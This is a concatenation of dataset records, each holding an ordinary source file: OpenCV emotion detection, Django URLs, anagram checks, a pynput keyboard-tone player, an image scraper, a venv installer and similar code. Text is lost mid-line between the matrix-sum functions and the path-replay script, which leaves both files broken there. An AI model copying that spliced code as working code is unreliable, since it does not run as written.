face_recognition.compare_faces(learnedFaceEncodings, face_encoding)\n name = 'User'\n if True in matches:\n first_match_index = matches.index(True)\n name = learnedFaceNames[first_match_index]\n cv2.putText(frame, 'Admin: ' + name, (left + 2, top - 100), font, 1, (255, 255, 255), 3)\n else:\n cv2.putText(frame, name, (left + 2, top - 100), font, 1, (255, 255, 255), 3)\n\n # draw rectangle\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n roi_gray = cv2.resize(roi_gray, (48, 48), interpolation=cv2.INTER_AREA)\n # rect,face,image = face_detector(frame)\n\n if np.sum([roi_gray]) != 0:\n roi = roi_gray.astype('float') / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n # make a prediction on the ROI, then lookup the class\n\n preds = classifier.predict(roi)[0]\n label = class_labels[preds.argmax()]\n label_position = (x, y - 10)\n cv2.putText(frame, label, label_position, cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 3)\n else:\n cv2.putText(frame, 'No Face Found', (20, 60), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 3)\n\n if fallen:\n cv2.putText(frame, fallenText, (20, 60), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 4)\n\n cv2.putText(frame, exitText, (1000, 30), font2, .75, (255, 255, 255), 1)\n cv2.imshow('Emotion Detector', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n","sub_path":"Emotion_Detection/Emotion_Detection.py","file_name":"Emotion_Detection.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"27752555","text":"\"\"\"Tests for utils in store\"\"\"\nfrom cg.store.models import FamilySample\nfrom cg.store.utils import get_links, get_samples\n\n\ndef test_get_samples(analysis_obj):\n \"\"\"Test function to get all samples from a analysis object\"\"\"\n # GIVEN an analysis object\n # WHEN fetching all samples\n samples = get_samples(analysis_obj)\n # THEN assert the samples are FamilySamples\n for sample in samples:\n assert isinstance(sample, FamilySample)\n\n\ndef test_link(family_obj):\n \"\"\"Test function to get all samples from a family\"\"\"\n # GIVEN an family object\n # WHEN fetching all links\n link_objs = get_links(family_obj)\n # THEN assert the link objs are samples\n for link_obj in link_objs:\n assert isinstance(link_obj, FamilySample)\n","sub_path":"tests/store/test_store_utils.py","file_name":"test_store_utils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"22822048","text":"from argparse import ArgumentParser\n\n\ndef get_arguments():\n parser = ArgumentParser(description='Sample Flask Application')\n\n parser.add_argument('-e', '--environment', type=str,\n default=\"dev\", choices=[\"dev\", \"stg\", \"prod\"])\n parser.add_argument('-p', '--port', type=int,\n choices=range(1024, 49150), default=5000)\n\n return parser.parse_args()\n","sub_path":"src/config/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"631663812","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'orders'\n\nurlpatterns = [\n url(r'^add_order/$', views.add_order, name=\"add_order\"),\n url(r'^modify_order/$', views.modify_order, name=\"modify\"),\n url(r'^(?P[0-9]+)/$', views.order_details, name=\"detail\"),\n url(r'^$', views.list_orders, name=\"list\"),\n]\n","sub_path":"Assign2/assign2/orders/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"587405636","text":"# -*- coding: utf-8 -*-\n\ndef somalinha(a):\n soma=0\n for i in range(0,a.shape[0],1):\n for j in range(0,a.shape[1],1):\n soma=soma+a[i,j]\n return(soma)\n \ndef somacoluna(a):\n soma=0\n for j in range(0,a.shape[1],1):\n for i in range(0,a.shape[0],1):\n soma=soma+a[i,j]\n return(soma)\n \ndef somadiagonal1(a):\n soma=0\n for i in range(0,a.shape[0],1):\n for j in range(0,a.shape[1],1):\n if i==j:\n soma=soma+a[i,j]\n return(soma) \n\ndef somadiagonal2(a):\n soma=0 \n i=0\n n=(a.shape[1])-1\n while i None:\n self.path = path\n self.points = path.points\n self.index = 0\n\n def draw_path(self, convas, frame_idx: int, ts):\n convas = plot_utils.draw_line_string(convas, self.points[self.index:], color.GREEN)\n if frame_idx >= self.path.first_frame and frame_idx <= self.path.last_frame:\n convas = plot_utils.draw_line_string(convas, self.points[0:self.index+1], color.RED, 3)\n \n pt = self.points[self.index]\n convas = cv2.circle(convas, pt.xy.astype(int), 7, color.RED, thickness=-1, lineType=cv2.LINE_AA)\n convas = plot_utils.draw_label(convas, str(self.path.luid), pt.xy.astype(int), color.BLACK, color.RED, 4)\n\n self.index += 1\n elif frame_idx > self.path.last_frame:\n last_pt = self.points[-1]\n convas = cv2.circle(convas, last_pt.xy.astype(int), 5, color.RED,\n thickness=-1, lineType=cv2.LINE_AA)\n convas = plot_utils.draw_label(convas, str(self.path.luid), last_pt.xy.astype(int),\n color.BLACK, color.RED, 3)\n\n return convas\n\nclass LocalPathDisplayProcessor(ImageProcessor):\n def __init__(self, capture: ImageCapture, paths: List[LocalPath], output_video: Path=None) -> None:\n super().__init__(capture, window_name='output', output_video=output_video,\n show_progress=False, stop_at_the_last=True)\n\n self.draws = [LocalPathDraw(path) for path in paths]\n\n def process_image(self, convas, frame_idx: int, ts):\n for draw in self.draws:\n convas = draw.draw_path(convas, frame_idx, ts)\n return convas\n\n\nimport sys\nimport argparse\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Replay a localpath on the screen\")\n parser.add_argument(\"node\", metavar='node_id', help=\"target node_id\")\n parser.add_argument(\"--conf\", help=\"DNA framework configuration\", default=DNA_CONIFIG_FILE)\n parser.add_argument(\"--no_sync\", help=\"do not sync to fps\", action=\"store_true\")\n parser.add_argument(\"--id\", type=int, nargs='+', help=\"target object id\")\n\n parser.add_argument(\"--output_video\", metavar=\"file\", help=\"output video file\", required=False)\n return parser.parse_known_args()\n\nif __name__ == '__main__':\n args, unknown = parse_args()\n\n conf = load_config(DNA_CONIFIG_FILE, args.node)\n config_grp = parse_config_args(unknown)\n\n camera_info = Camera.from_conf(conf.camera)\n\n platform = DNAPlatform.load_from_config(conf.platform)\n rset = platform.get_resource_set(\"local_paths\")\n\n lpaths = []\n first_frame = sys.maxsize * 2 + 1\n last_frame = 0\n for id in args.id:\n lpath = rset.get((camera_info.camera_id, id))\n if lpath:\n 
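# Widen the replay window so it spans every requested path.\n            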
first_frame = min(first_frame, lpath.first_frame)\n last_frame = max(last_frame, lpath.last_frame)\n else:\n print(f\"invalid track object: camera_id='{camera_info.camera_id}', id='{args.id}'\", file=sys.stderr)\n exit(-1)\n lpaths.append(lpath)\n print(f\"path: {first_frame} -> {last_frame}\")\n\n begin_frame = max(first_frame - 5, 1)\n end_frame = last_frame\n cap = camera_info.get_capture(sync=not args.no_sync, begin_frame=begin_frame, end_frame=end_frame)\n with LocalPathDisplayProcessor(cap, lpaths,\n output_video=args.output_video) as processor:\n from timeit import default_timer as timer\n from datetime import timedelta\n\n started = timer()\n frame_count = processor.run()\n elapsed = timer() - started\n fps = frame_count / elapsed\n\n print(f\"elapsed_time={timedelta(seconds=elapsed)}, fps={fps:.1f}\" )","sub_path":"bin/dna_replay_local_path.py","file_name":"dna_replay_local_path.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"333005961","text":"original_str = \"jugall\"\ncompare_str = \"lauglj\"\n\n\ndef is_anagram_dict(original_string, compare_string):\n\n if not original_string or not compare_string:\n return False\n\n original_string = original_string.replace(\" \", \"\").lower()\n compare_string = compare_string.replace(\" \", \"\").lower()\n\n if len(original_string) != len(compare_string):\n return False\n\n char_count_dict = dict()\n\n for char in original_string:\n if char in char_count_dict:\n char_count_dict[char] = char_count_dict[char] + 1\n else:\n char_count_dict[char] = 1\n\n for char in compare_string:\n if char not in char_count_dict:\n return False\n\n elif char_count_dict[char] > 1:\n char_count_dict[char] = char_count_dict[char] - 1\n else:\n char_count_dict.pop(char)\n\n return True\n\n\nprint(is_anagram_dict(original_str, compare_str))\n\n\n\nfrom collections import Counter\ndef anagram_collection_counter(original_string, compare_string):\n # Counter() returns a dictionary data\n # structure which contains characters\n # of input as key and their frequencies\n # as its corresponding value\n return Counter(original_string) == Counter(compare_string)\n\n\n# Driver function\nprint(anagram_collection_counter(original_str, compare_str))\n\n\ndef anagram_sorting(original_string, compare_string):\n original_string = original_string.replace(\" \", \"\").lower()\n compare_string = compare_string.replace(\" \", \"\").lower()\n\n if len(original_string) != len(compare_string):\n return False\n\n return sorted(original_string) == sorted(compare_string)\n\nprint(anagram_sorting(original_str, compare_str))\n\n\n\n","sub_path":"ds/array/anagram_check.py","file_name":"anagram_check.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"624818811","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom pynput import keyboard\nimport threading\nimport time\nimport random\n\nkey_repeat_limit = 4\nplayAudioFile = None\nlastKey = None\n\ntry:\n import winsound\n def _temp(fname):\n winsound.PlaySound(fname, winsound.SND_FILENAME)\n playAudioFile = _temp\nexcept ImportError as ee:\n pass\n\nif playAudioFile is None:\n import pygame\n pygame.mixer.init(44100, -16, 1, 1024)\n def _temp(fname):\n pygame.mixer.music.load(fname)\n pygame.mixer.music.play()\n #-- while pygame.mixer.music.get_busy():\n #-- time.sleep(0.05)\n time.sleep(0.2)\n playAudioFile = _temp\n\nkey2wavs = { \"q\" : 2, \"w\" : 
4, \"e\" : 5, \"r\" : 7, \"t\" : 9, \"y\" : 11, \"u\" : 0, \"i\" : 2, \"o\" : 4, \"p\" : 5,\n \"1\" : 1, \"2\" : 2, \"3\" : 3, \"4\" : 4, \"5\" : 5, \"6\" : 6, \"7\" : 7, \"8\" : 8, \"9\" : 9, \"0\" : 10,\n \"z\" : 14, \"x\" : 16, \"c\" : 17, \"v\" : 19, \"b\" : 21, \"n\" : 5, \"m\" : 7, \",\" : 9, \".\" : 11, \"/\" : 2,\n \"a\" : 2, \"s\" : 9, \"d\" : 5, \"f\" : 7, \"g\" : 11, \"h\" : -1, \"j\" : 2, \"k\" : -2, \"l\" : 1, \";\" : 5,\n \"{\" : 3, \"}\" : -3, \"(\" : 2, \")\" : -2, \"[\" : 1, \"]\" : -1 ,\n \"space\" : -6, \"tab\" : 0, \"delete\" : -4, \"backspace\" : -4, \"enter\" : -2,\n }\n\ninterval = []\nrptc = 0\n\ndef getFname(tx):\n return \"wavs/sound{}.wav\".format(tx)\n\ndef playTone(tx):\n fname = getFname(tx)\n playAudioFile(fname)\n\ndef playInterval(intv):\n baseidx = 18\n t1 = baseidx\n t2 = baseidx + intv\n #playTone(t1)\n playTone(t2)\n\ndef playThread():\n while True:\n if len(interval) > 0:\n playInterval(interval.pop(0))\n else:\n time.sleep(0.05)\n\ndef processKey(key):\n global lastKey\n global rptc\n #-- if random.random() > 0.2:\n #-- return True\n if len(interval) > 4:\n return True\n ret = True\n temp = None\n temp = str(key)\n kk = None\n if temp.startswith(u\"Key\"):\n kk = temp[4:]\n elif len(temp) == 3:\n kk = temp[1]\n if kk != None:\n tt = key2wavs.get(kk)\n if tt is not None:\n if kk == lastKey:\n rptc += 1\n else:\n rptc = 0\n if rptc < key_repeat_limit:\n interval.append(tt)\n if lastKey == \"f11\" and kk == \"f12\":\n ret = False\n lastKey = kk\n return ret\n\nth = threading.Thread(target=playThread)\nth.daemon = True\nth.start()\n\nwith keyboard.Listener(on_press=processKey) as listener:\n listener.join()\n\n\n","sub_path":"keytone/keytone.py","file_name":"keytone.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"615753006","text":"#!/usr/bin/env python3\nimport json\nimport os\nimport multiprocessing\nimport requests\n\nUSER_AGENT = \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n\n\ndef download_review_photos(session, review_filepath, output_dir):\n with open(review_filepath, \"r\") as f:\n review = json.load(f)\n\n for i, review_photo_url in enumerate(review):\n with open(os.path.join(output_dir, f\"{i}.jpg\"), \"wb\") as f:\n with session.get(review_photo_url, stream=True) as r:\n for chunk in r.iter_content(chunk_size=65536):\n f.write(chunk)\n\n\ndef download_review(review_filename):\n if not review_filename.endswith(\".json\"):\n return\n session = requests.session()\n session.headers[\"User-Agent\"] = USER_AGENT\n review_id = os.path.splitext(review_filename)[0]\n output_dir = os.path.join(\"review_photos\", review_id)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n download_review_photos(\n session, os.path.join(\"review_photos\", review_filename), output_dir\n )\n\n\ndef main():\n with multiprocessing.Pool(6) as pool:\n pool.map(download_review, os.listdir(\"review_photos\"))\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"image_scraper.py","file_name":"image_scraper.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552683184","text":"import mcpi.minecraft as minecraft\n\nmc = minecraft.Minecraft.create()\n\nmc.postToChat(\"Hello Minecraft World\")\n\nimport time\n\nwhile(1):\n pos = mc.player.getTilePos()\n\n print(pos.x)\n print(pos.y)\n print(pos.z)\n\n 
from led import *\n\n if pos.y > 5:\n green_led(1)\n else:\n green_led(0)\n\n time.sleep(5)\n","sub_path":"a_minecraft/python_modding/python_code/MCpos.py","file_name":"MCpos.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463675482","text":"# Vectors and interpolation/08-timescaling.py\nfrom Panda import *\n\n# This path is a square\npath = at(P3(-1.5,0,-1.5)) + forever(move(1, P3(3, 0, 0)) + move(1, P3(0,0,3)) + move(1, P3(-3, 0, 0)) + move(1, P3(0,0,-3)))\n# How long does this path take to traverse?\n# This is a function definition - it launches a panda using t as the time base,\n# p0 as the initial position, and painted the given color.\ndef go(t, color):\n panda(position = interpolate(t, path), color = color)\n \ngo(time, red)\n# Create a second panda that follows the same path at the opposite side of the square, ahead of the original\n# Create another panda that goes twice as fast\n# Create a panda that is exactly 1 second behind the first one\n# Can you make one that speeds up more and more?\n\ngo(time-2, blue)\ngo(time*2, green)\ngo(time-1, yellow)\ngo(time*time, white)\nstart()\n","sub_path":"CompletedPandaHandouts/src/Vectors and Interpolation/08-timescaling.py","file_name":"08-timescaling.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"376738517","text":"# -*- coding: utf-8 -*-\r\n# -*- author: JeremySun -*-\r\n# -*- dating: 20/1/25 -*-\r\n\r\n\r\n\"\"\"\r\nBackground knowledge: exec\r\nArgument 1: a command as a string\r\nArgument 2: the global scope (a dict); defaults to globals() if not given\r\nArgument 3: the local scope (a dict); defaults to locals() if not given\r\n\"\"\"\r\n\r\ng = {\r\n 'x': 1,\r\n 'y': 2\r\n}\r\n\r\nl = {}\r\n\r\nexec(\"\"\"\r\nglobal x, m\r\nx = 10\r\nm = 100\r\n\r\nz = 3\r\n\"\"\", g, l)\r\nprint(g)\r\nprint(l)\r\n\r\n\"\"\"\r\nEverything is an object. What can an object be used for?\r\n 1. It can be referenced: x = obj;\r\n 2. It can be passed as a function argument;\r\n 3. It can be used as a function's return value;\r\n 4. It can be an element of a container (list, tuple, etc.).\r\n\r\nClasses are objects too: Foo = type(...)\r\n\"\"\"\r\n\r\n\r\nclass Foo(object):\r\n pass\r\n\r\n\r\nclass Bar(object):\r\n pass\r\n\r\n\r\nobj = Foo()\r\nprint(type(obj)) # <class '__main__.Foo'>\r\nprint(type(Foo)) # <class 'type'>\r\nprint(type(Bar)) # <class 'type'>\r\n# As shown, the metaclass of each is type\r\n\r\n\"\"\"\r\nMetaclass: the class that produces classes is a metaclass.\r\n By default, classes defined with the class keyword have type as their metaclass\r\n\"\"\"\r\n\r\n\r\n# Two ways to define a class:\r\n# Way 1: the class keyword. Under the hood the type metaclass is called to produce the class, i.e. Chinese = type(...)\r\n\r\nclass Chinese(object):\r\n country = 'China' # every Chinese person has a nationality\r\n\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\n def talk(self):\r\n print('{name} is talking'.format(name=self.name))\r\n\r\n\r\n# Way 2: type\r\n# Three ingredients of a class: its name; its base classes; its namespace\r\nclass_name = 'Chinese'\r\nclass_bases = (object,)\r\nclass_body = \"\"\"\r\ncountry = 'China' # every Chinese person has a nationality\r\n\r\ndef __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\ndef talk(self):\r\n print('{name} is talking'.format(name=self.name))\r\n\"\"\"\r\nclass_dic = {} # initial state\r\nexec(class_body, globals(), class_dic)\r\nprint(class_dic)\r\n# Build the class\r\nChina = type(class_name, class_bases, class_dic)\r\nprint(Chinese)\r\nprint(China)\r\n","sub_path":"Class Learn/26 元类介绍.py","file_name":"26 元类介绍.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"420421899","text":"#!/usr/bin/env python3\nimport csv\nfrom datetime import datetime\nfrom datetime import timedelta\nimport sys\n\ndef merge_utlog_files(input_files):\n merged_data = {}\n\n # Merge all the input files\n for file in input_files:\n with 
open(file, 'r') as f:\n reader = csv.reader(f)\n header = next(reader) # skip the header row\n\n for row in reader:\n timestamp = float(row[0])\n timestamp = round_to_nearest_minute(timestamp) # round the timestamp to the nearest minute\n\n if timestamp not in merged_data:\n merged_data[timestamp] = {}\n\n for i, data in enumerate(row[1:]):\n column_name = f\"CH{i+1}\"\n\n if column_name not in merged_data[timestamp]:\n merged_data[timestamp][column_name] = []\n\n merged_data[timestamp][column_name].append(float(data))\n\n # Compute the average for each one-minute bucket\n merged_utlog_data = []\n column_names = sorted(set([column for data in merged_data.values() for column in data.keys()]))\n\n for timestamp in sorted(merged_data.keys()):\n row = [timestamp]\n\n for column_name in column_names:\n if column_name in merged_data[timestamp]:\n data = merged_data[timestamp][column_name]\n average = sum(data) / len(data)\n row.append(average)\n else:\n row.append(\"\")\n\n merged_utlog_data.append(row)\n\n # Build the output file name\n current_datetime = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n output_file = f\"utlog_merged_{current_datetime}.csv\"\n\n # Write out the results\n with open(output_file, 'w', newline='') as f:\n writer = csv.writer(f)\n header = [\"Timestamp\"] + column_names\n writer.writerow(header) # write the header row\n\n for row in merged_utlog_data:\n writer.writerow(row)\n\n print(f\"Results were written to {output_file}.\")\n\ndef round_to_nearest_minute(timestamp):\n dt = datetime.fromtimestamp(timestamp)\n rounded_dt = dt - timedelta(seconds=dt.second, microseconds=dt.microsecond) + timedelta(minutes=1)\n return rounded_dt.timestamp()\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print(\"Usage: python utlog_merge.py input_file_1 input_file_2 ...\")\n sys.exit(1)\n\n input_files = sys.argv[1:]\n merge_utlog_files(input_files)\n","sub_path":"opt/pyplot/utlog_merge.py","file_name":"utlog_merge.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52939366","text":"import sys\nfrom collections import defaultdict\n\n\ndef main():\n array = [i for i in name.keys() if name[i] == 2]\n array.sort()\n print(len(array))\n print(\"\\n\".join(array))\n\n\nif __name__ == \"__main__\":\n input = sys.stdin.readline\n n, m = map(int, input().split())\n name = defaultdict(int)\n for _ in range(n + m):\n name[input().rstrip()] += 1\n\n main()\n","sub_path":"0707/1764 듣보잡.py","file_name":"1764 듣보잡.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610084794","text":"import discord\nfrom redbot.core import commands\nfrom TagScriptEngine import Interpreter, adapter, block\n\n\nclass Tag(object):\n def __init__(\n self,\n name: str,\n tagscript: str,\n *,\n invoker: discord.Member = None,\n author: discord.Member = None,\n author_id: int = None,\n uses: int = 0,\n ctx: commands.Context = None\n ):\n self.name = name\n self.tagscript = tagscript\n self.invoker = 
data.get(\"invoker\")\n self.author_id = data.get(\"author_id\", data.get(\"author\"))\n if ctx:\n self.ctx = ctx\n self.author = ctx.guild.get_member(data.get(\"author\"))\n else:\n self.ctx = None\n self.author = None\n return self\n","sub_path":"tags/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"417775943","text":"from collections import deque\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n \"\"\"\n Approach 1: DFS - iterative in order\n TC: O(h + k) --> O(n) worst case\n SC: O(h)\n \"\"\"\n\n def kthSmallest(self, root: TreeNode, k: int) -> int:\n stack = deque()\n curr = root\n while stack or curr:\n while curr:\n stack.append(curr)\n curr = curr.left\n curr = stack.pop()\n\n # logic\n k -= 1\n if k == 0: return curr.val\n curr = curr.right\n return\n\n \"\"\"\n Approach 2: DFS recursive\n TC: O(n)\n SC: O(h)\n \"\"\"\n\n def __init__(self):\n self.count = 0\n self.result = None\n\n def kthSmallest(self, root: TreeNode, k: int) -> int:\n self.inorder(root, k)\n return self.result\n\n def inorder(self, root, k):\n # base\n if not root:\n return\n\n # logic\n self.inorder(root.left, k)\n self.count += 1\n if k == self.count:\n self.result = root.val\n return\n self.inorder(root.right, k)\n\n \"\"\"\n Followup - if the same operation needs to be done frequently:\n 1) in the constructor, traverse through all nodes and identify number of nodes on left and right of each node\n 2) based on this count you can do a binary search find of an approach\n\n \"\"\"","sub_path":"Problem-1.py","file_name":"Problem-1.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191626789","text":"import os\nimport cv2\nimport pickle\n\n\ndef get_data(p, folder_list):\n if p['LoadFromCache']:\n images = pickle.load(open(p['CachePath'], \"rb\"))\n labels = pickle.load(open(p['CacheLablesPath'], \"rb\"))\n else:\n folder_path = p['BaseDataPath']\n images, labels = open_folders(p, folder_path, folder_list)\n pickle.dump(images, open(p['CachePath'], \"wb\"))\n pickle.dump(labels, open(p['CacheLablesPath'], \"wb\"))\n return images, labels\n\n\ndef open_folders(p, folder_path, folder_list):\n folders = os.listdir(folder_path)\n labels = []\n images = []\n for fo in folder_list:\n folder_path_of_image = os.path.join(folder_path, folders[fo])\n image, label = open_files(p, folder_path_of_image, folders[fo])\n images.append(image)\n labels.append(label)\n return images, labels\n\n\ndef open_files(p, folder_path_of_images, label):\n images = []\n labels = []\n files = os.listdir(folder_path_of_images)\n number_of_files = len(files)\n if number_of_files > p['NumberOfImages']:\n number_of_files = p['NumberOfImages']\n for fi in range(number_of_files):\n labels.append(label)\n image_path = os.path.join(folder_path_of_images, files[fi])\n dest_path = os.path.join(folder_path_of_images, \"Scaled_\" + files[fi])\n image = resize_image(p, image_path, dest_path)\n images.append(image)\n return images, labels\n\n\ndef resize_image(p, image_path, DestPath):\n src_image = cv2.imread(image_path)\n gray_image = cv2.cvtColor(src_image, cv2.COLOR_RGB2GRAY)\n scaled_image = cv2.resize(gray_image, (p['ResizePixelSize'], p['ResizePixelSize']), 
interpolation=cv2.INTER_LANCZOS4)\n return scaled_image\n # images.append(scaledImage)\n","sub_path":"GetData.py","file_name":"GetData.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"138762178","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2010 United States Government as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All Rights Reserved.\n#\n# Copyright 2010 OpenStack, LLC\n# Copyright 2013 IBM Corp.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nInstallation script for python-keystoneclient's development virtualenv\n\"\"\"\n\nimport os\nimport sys\n\nimport install_venv_common as install_venv\n\n\nclass Debian(install_venv.Distro):\n \"\"\"This covers all Debian-based distributions.\"\"\"\n\n def check_pkg(self, pkg):\n return run_command_with_code(['dpkg', '-l', pkg],\n check_exit_code=False)[1] == 0\n\n def apt_install(self, pkg, **kwargs):\n run_command(['sudo', 'apt-get', 'install', '-y', pkg], **kwargs)\n\n def apply_patch(self, originalfile, patchfile):\n run_command(['patch', originalfile, patchfile])\n\n def install_virtualenv(self):\n if self.check_cmd('virtualenv'):\n return\n\n if not self.check_pkg('python-virtualenv'):\n self.apt_install('python-virtualenv', check_exit_code=False)\n\n super(Debian, self).install_virtualenv()\n\n\nclass Suse(install_venv.Distro):\n \"\"\"This covers all SuSE distributions.\"\"\"\n\n def check_pkg(self, pkg):\n return run_command_with_code(['rpm', '-q', pkg],\n check_exit_code=False)[1] == 0\n\n def zypper_install(self, pkg, **kwargs):\n run_command(['sudo', 'zypper', '-qn', 'install', pkg], **kwargs)\n\n def apply_patch(self, originalfile, patchfile):\n run_command(['patch', originalfile, patchfile])\n\n def install_virtualenv(self):\n if self.check_cmd('virtualenv'):\n return\n\n if not self.check_pkg('python-virtualenv'):\n self.zypper_install('python-virtualenv', check_exit_code=False)\n\n super(Suse, self).install_virtualenv()\n\n\ndef print_help():\n help = \"\"\"\n python-keystoneclient development environment setup is complete.\n\n python-keystoneclient development uses virtualenv to track and manage\n Python dependencies while in development and testing.\n\n To activate the python-keystoneclient virtualenv for the extent of your\n current shell session you can run:\n\n $ source .venv/bin/activate\n\n Or, if you prefer, you can run commands in the virtualenv on a case by case\n basis by running:\n\n $ tools/with_venv.sh \n\n Also, make test will automatically use the virtualenv.\n \"\"\"\n print(help)\n\n\ndef main(argv):\n root = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n venv = os.path.join(root, '.venv')\n pip_requires = os.path.join(root, 'requirements.txt')\n test_requires = os.path.join(root, 'test-requirements.txt')\n py_version = \"python%s.%s\" % (sys.version_info[0], sys.version_info[1])\n project = 'python-keystoneclient'\n 
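# Build the installer, then swap in a distro-specific strategy below so a\n    # missing virtualenv package can be installed with the native tool.\n    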
install = install_venv.InstallVenv(root, venv, pip_requires, test_requires,\n py_version, project)\n if os.path.exists('/etc/SuSE-release'):\n install_venv.Distro = Suse\n elif os.path.exists('/etc/debian_version'):\n install_venv.Distro = Debian\n options = install.parse_args(argv)\n install.check_python_version()\n install.check_dependencies()\n install.create_virtualenv(no_site_packages=options.no_site_packages)\n install.install_dependencies()\n install.run_command([os.path.join(venv, 'bin/python'),\n 'setup.py', 'develop'])\n install.post_process()\n print_help()\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"tools/install_venv.py","file_name":"install_venv.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633536616","text":"from __future__ import print_function\nfrom generation import *\n\nimport sys\n\nimport resource\n\ndef memory_usage_ps():\n import subprocess\n import os\n out = subprocess.Popen(['ps', 'v', '-p', str(os.getpid())],\n stdout=subprocess.PIPE).communicate()[0].split(b'\\n')\n vsz_index = out[0].split().index(b'RSS')\n mem = float(out[1].split()[vsz_index]) / 1024\n return mem\n\nmyGen = Generation(200)\nmyGen.randomizeMembers(200)\nmyDeck = Deck(4)\n\nfor gen in range(200):\n myGen.playGames(10000, myDeck)\n myGen.sort()\n\n BestWins = [strat.getWins() for strat in myGen[:5]]\n \n print(\"Done Generation \"+str(gen))\n print(\"The best win rates were: \" + str(BestWins))\n print(\"Generation \"+str(gen)+ \" best strategy:\\n\"+str(myGen[0]), file=sys.stderr)\n\n tempGen = Generation(200)\n tempGen.cloneMembers(myGen, 0, 10)\n tempGen.cloneMembers(myGen, 0, 10)\n tempGen.cloneMembers(myGen, 0, 10)\n tempGen.cloneMembers(myGen, 0, 30)\n tempGen.cloneMembers(myGen, 10, 20)\n tempGen.cloneMembers(myGen, 30, 20)\n tempGen.faultyCloneMembers(myGen, 0, 30)\n tempGen.faultyCloneMembers(myGen, 0, 30)\n tempGen.randomizeMembers(20)\n tempGen.randomizeMembers(20)\n\n del myGen\n myGen = tempGen\n del tempGen\n print (memory_usage_ps())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"8620745","text":"# python imports\nimport concurrent.futures\n\n# project imports\nfrom .stock import Stock\nfrom .beverage import Beverage\n\n\nclass CoffeeMachine:\n \n def __init__(self, outlets: int, total_ingredients: dict):\n self.outlets = outlets\n self.stock = Stock.get_instance()\n self.stock.add_stock(total_ingredients)\n \n def serve(self, beverages: dict):\n \"\"\"Serve beverages in parallel to customers.\n\n 